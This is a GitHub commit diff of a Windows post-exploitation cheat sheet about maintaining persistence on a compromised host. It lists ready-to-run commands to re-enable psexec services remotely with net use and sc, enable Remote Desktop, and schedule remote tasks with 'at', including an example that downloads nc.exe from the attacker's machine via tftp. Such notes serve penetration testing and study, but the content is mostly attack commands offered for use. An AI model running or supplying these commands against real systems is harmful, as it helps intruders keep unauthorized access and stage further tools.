Skip to content

Commit df440da

Browse files
WebBreacherWebBreacher
committed
Adding more content.
1 parent 85e83e9 commit df440da

File tree

1 file changed

+17
-8
lines changed

1 file changed

+17
-8
lines changed

persistence/windows/general.md

Lines changed: 17 additions & 8 deletions
Original file line numberDiff line numberDiff line change
@@ -17,13 +17,13 @@ Commands to run to maintain persistence after you have exploited it and are usua
1717
### Enable `psexec`
1818
The [`psexec` tool](http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx) executes processes on other systems over a network. Most systems now disable the "clipbook" which `psexec` required. According to Val Smith's and Colin Ames' [BlackHat 2008 presentation (page 50)](http://www.blackhat.com/presentations/bh-usa-08/Smith_Ames/BH_US_08_Smith_Ames_Meta-Post_Exploitation.pdf), you can re-enable the sub-systems needed to use `psexec` using the `sc` commands below.
1919

20-
``c:\> net use \\target\ipc$ username /user:password
21-
c:\> sc \\target config netdde start= auto
22-
c:\> sc \\target config netddedsdm start= auto
23-
c:\> sc \\target config clipsrv start= auto
24-
c:\> sc \\target start netdde
25-
c:\> sc \\target start netddedsdm
26-
c:\> sc \\target start clipsrv
20+
``c:\> net use \\[TargetIP]\ipc$ username /user:password
21+
c:\> sc \\[TargetIP] config netdde start= auto
22+
c:\> sc \\[TargetIP] config netddedsdm start= auto
23+
c:\> sc \\[TargetIP] config clipsrv start= auto
24+
c:\> sc \\[TargetIP] start netdde
25+
c:\> sc \\[TargetIP] start netddedsdm
26+
c:\> sc \\[TargetIP] start clipsrv
2727
``
2828

2929
### Enable Remote Desktop
@@ -64,4 +64,13 @@ c:\> copy c:\windows\security\database\secedit.sdb c:\windows\security\database\
6464
c:\> secedit /configure /db new.secedit.sdb /cfg fix_ts_policy.ini
6565
c:\> gpupdate /Force
6666
c:\> net start "terminal services"
67-
``
67+
``
68+
69+
### Scheduler
70+
The [Windows scheduler](http://support.microsoft.com/kb/313565) can be used to further compromise a system. According to Val Smith's and Colin Ames' [BlackHat 2008 presentation (page 58)](http://www.blackhat.com/presentations/bh-usa-08/Smith_Ames/BH_US_08_Smith_Ames_Meta-Post_Exploitation.pdf), you can remotely schedule tasks using the commands below.
71+
72+
``c:\> net use \\[TargetIP]\ipc$ password /user:username
73+
c:\> at \\[TargetIP] 12:00 pm command
74+
``
75+
76+
An example you might run on the remote system might be: `at \\192.168.1.1 12:00pm tftp -I [MyIP] GET nc.exe`

0 commit comments

Comments
 (0)